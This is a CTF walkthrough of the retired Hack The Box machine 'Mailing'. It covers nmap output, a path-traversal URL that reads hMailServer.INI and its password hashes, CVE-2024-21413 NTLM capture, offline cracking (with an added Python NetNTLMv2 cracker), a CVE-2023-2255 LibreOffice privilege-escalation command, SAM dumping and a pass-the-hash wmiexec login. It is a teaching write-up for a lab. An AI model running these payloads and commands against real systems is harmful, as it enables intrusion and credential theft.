Mailing HTB
Mailing was an easy Windows machine on Hack The Box. I had to wait until it was retired to post a walkthrough for it, since I didn't want to violate their ToS. I booted up the machine and grabbed the IP address, then ran an nmap scan for all open ports, followed by a version and script scan on the ports it found.
nmap -p- 10.10.11.14

PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
465/tcp   open  smtps
587/tcp   open  submission
993/tcp   open  imaps
5040/tcp  open  unknown
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
59533/tcp open  unknown
nmap -sV -sC -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001,49664,49665,49666,49667,49668,59533 10.10.11.14

PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: IMAP4 QUOTA IMAP4rev1 CHILDREN RIGHTS=texkA0001 IDLE completed SORT OK CAPABILITY ACL NAMESPACE
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
587/tcp   open  smtp          hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: IMAP4 QUOTA IMAP4rev1 CHILDREN RIGHTS=texkA0001 IDLE completed SORT OK CAPABILITY ACL NAMESPACE
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
59533/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-09-01T22:41:17
|_  start_date: N/A
I saw in the nmap scan that the domain was mailing.htb, so I added that to my /etc/hosts file, then went to the page in my browser.
I noticed a button at the bottom for “Download Instructions”, so I clicked on that, which led me to a PDF file on how to set up email accounts in an email client. It also contained an email address for a user, Maya. I noticed as well that every URL on the site went through a file parameter (file=page.php), so I tested that parameter for LFI. I pulled the download.php source first, which came back with the following:
Download.php

<?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    // user input is concatenated straight onto the base directory, nothing strips "..\"
    $file_path = 'C:/wwwroot/instructions/' . $file;

    if (file_exists($file_path)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file_path));
        echo(file_get_contents($file_path));
        exit;
    } else {
        echo "File not found.";
    }
} else {
    echo "No file specified for download.";
}
?>
That worked, and it showed me the base path the script was using. The source also explains why the traversal works: $file is appended to C:/wwwroot/instructions/ with no sanitisation, so a value starting with ..\ walks out of that directory (Windows accepts backslashes as separators even though the hard-coded prefix uses forward slashes, and there is no basename() or realpath() check before file_exists()). I then hit Google to look more into hMailServer and came across a verified File Inclusion exploit: https://www.exploit-db.com/exploits/7012
That write-up gives a few URLs to try, and one of them worked for me (note the %5C-encoded backslashes and the + for spaces; PHP decodes both before the concatenation):
http://mailing.htb/download.php?file=..%5C..%5C..%5CProgram+Files+(x86)%5ChMailServer%5CBin%5ChMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
With the right URL I could read hMailServer.INI, which stores the administrator password as an unsalted MD5 hash. I took that to CrackStation and got the password homenetworkingadministrator.
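As an added example (not code from the post or from the box), here is download.php's path handling modelled in Python together with the check it is missing. ntpath reproduces the Windows semantics on any OS and nothing touches the disk; BASE_DIR mirrors the script's hard-coded prefix, and instructions.pdf is an assumed legitimate file name.

```python
# Added example: model of download.php's path handling and the missing check.
# ntpath gives Windows path semantics on any OS; no real files are touched.
import ntpath
from urllib.parse import unquote_plus

BASE_DIR = "C:/wwwroot/instructions/"   # prefix hard-coded in download.php


def php_file_path(file_param: str) -> str:
    """Reproduce the vulnerable script: PHP's $_GET URL-decodes the value
    (%5C -> '\\', '+' -> ' '), the script string-concatenates it onto
    BASE_DIR, and the Windows file system then treats '/' and '\\' alike
    and honours '..'. ntpath.normpath performs that last step here."""
    decoded = unquote_plus(file_param)
    return ntpath.normpath(BASE_DIR + decoded)


def is_inside_base(resolved: str) -> bool:
    """The missing check: serve only paths that stay under BASE_DIR."""
    base = ntpath.normpath(BASE_DIR)
    try:
        return ntpath.commonpath([base, resolved]) == base
    except ValueError:   # different drive or UNC prefix: treat as escape
        return False


def safe_download_path(file_param: str):
    """Hardened lookup: the resolved path if it is still under BASE_DIR,
    otherwise None (the script should answer 400/404 instead of reading)."""
    resolved = php_file_path(file_param)
    return resolved if is_inside_base(resolved) else None


if __name__ == "__main__":
    payload = "..%5C..%5C..%5CProgram+Files+(x86)%5ChMailServer%5CBin%5ChMailServer.INI"
    print(php_file_path(payload))        # where the vulnerable script really reads
    print(safe_download_path(payload))   # None: the hardened version refuses it
    print(safe_download_path("instructions.pdf"))   # assumed legitimate name
```

Because the script concatenates strings rather than joining paths, an absolute value such as C:\Windows\win.ini stays under the base (and simply does not exist); the traversal only works because of the ..\ sequences, which is exactly what the commonpath check catches.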
With that, I did some more googling and found this exploit for Microsoft Outlook (CVE-2024-21413), which fit now that I had SMTP credentials: https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
I ran the exploit against the server name on port 587, with the username administrator, the password I had obtained, and the other known address, maya@mailing.htb, as the recipient. The exploit mails the target a message with a crafted link that points back at an SMB share on the attacking host; when the Outlook client follows it, it authenticates with NTLM and hands over a NetNTLMv2 challenge-response, so a listener such as Responder has to be running on the attacking host to catch it.
Almost instantly I got a hash for the user maya! A NetNTLMv2 response can only be brute-forced offline, so I booted up John.
maya::MAILING:9eba9657e897eda[...]
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
John cracked the hash and gave me a password for maya, m4y4ngs4ri. From there, I looked at the ports again to see how I could use these credentials and realised WinRM (5985) was running. So I booted up evil-winrm and was able to log in!
evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri
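To show what the captured line actually contains and why John can crack it offline, here is an added example (my own code, not the post's and not part of the linked exploit or John): it builds a NetNTLMv2 line in the john/hashcat layout from a constructed challenge and blob, then checks candidate passwords against it the way a cracker does. The challenge, blob and timestamp are made up; the only thing taken from the post is the password used as the constructed target. MD4 is implemented in pure Python because many OpenSSL 3 builds no longer expose it through hashlib.

```python
# Added example: NetNTLMv2 construction and offline verification.
# NT hash        = MD4(UTF-16LE(password))
# NTLMv2 key     = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
# NTProofStr     = HMAC-MD5(NTLMv2 key, server_challenge || blob)
# Everything except the password is in the capture, so one guess costs
# one MD4 and two HMAC-MD5 calls. Sample values below are constructed.
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib may lack it on OpenSSL 3)."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: ((v << s) | (v >> (32 - s))) & M
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + X[idx] + k) & M, shifts[i % 4])
                a, b, c, d = d, a, b, c        # rotate the working registers
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntproofstr(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(key, challenge + blob, "md5").digest()


def hash_line(user: str, domain: str, challenge: bytes, proof: bytes, blob: bytes) -> str:
    """Layout used by Responder, john --format=netntlmv2 and hashcat -m 5600."""
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, candidates):
    """What john does per wordlist entry: recompute NTProofStr and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for pw in candidates:
        if hmac.compare_digest(ntproofstr(pw, user, domain, chal, blob), proof):
            return pw
    return None


# Constructed capture (not the hash from the box): challenge, timestamp and
# client challenge are arbitrary; the AV pair carries the NetBIOS domain.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = (
    bytes.fromhex("0101000000000000")                           # signature + reserved
    + bytes.fromhex("00c0a9a0d6c0da01")                         # timestamp (arbitrary)
    + bytes.fromhex("8899aabbccddeeff")                         # client challenge
    + bytes(4)                                                  # reserved
    + bytes.fromhex("02000e004d00410049004c0049004e004700")     # AvNbDomainName "MAILING"
    + bytes(4)                                                  # end-of-list AV pair
)
SAMPLE_PASSWORD = "m4y4ngs4ri"   # the post's recovered password, used as the target here
SAMPLE_LINE = hash_line(
    "maya", "MAILING", SAMPLE_CHALLENGE,
    ntproofstr(SAMPLE_PASSWORD, "maya", "MAILING", SAMPLE_CHALLENGE, SAMPLE_BLOB),
    SAMPLE_BLOB,
)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["password", "Summer2024", "m4y4ngs4ri"]))
```

The server challenge and blob are different for every capture, so a cracked line cannot be replayed, but they are no obstacle to guessing: the per-guess work is a single MD4 plus two HMAC-MD5s, which is why a rockyou-grade password falls in seconds.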
Once I got here I was stuck for a little bit. I tried running WinPEAS and looked through all kinds of directories for anything I might be able to leverage for PE. I found a file that was a little out of place: a LibreOffice document. The installed LibreOffice was version 7.4, so I googled for known exploits for that version; it took a little digging, but I found one: https://github.com/elweth-sec/CVE-2023-2255. It is worth checking the exact build before relying on it, since CVE-2023-2255 only affects 7.4 releases before 7.4.7 (and 7.5 before 7.5.4); this install was old enough for the exploit to work.
I ran the exploit with a command to add maya to the local Administrators group, which produced a malicious .odt file. I uploaded it to the target machine, and once the document was opened I had those privileges. After that I downloaded the SAM and SYSTEM hives and dumped the hashes, which gave me the NT hash for localadmin. I then used wmiexec to pass the hash and log in (the aad3b435... half is the empty-LM placeholder, so only the NT half is doing anything):
python3 CVE-2023-2255.py --cmd 'net localgroup Administrators maya /add'
impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae
Overall this was a pretty challenging box. It was rated as easy, but the priv esc portion had me rethinking a lot as I was stuck for quite some time trying to figure it out.
-Sam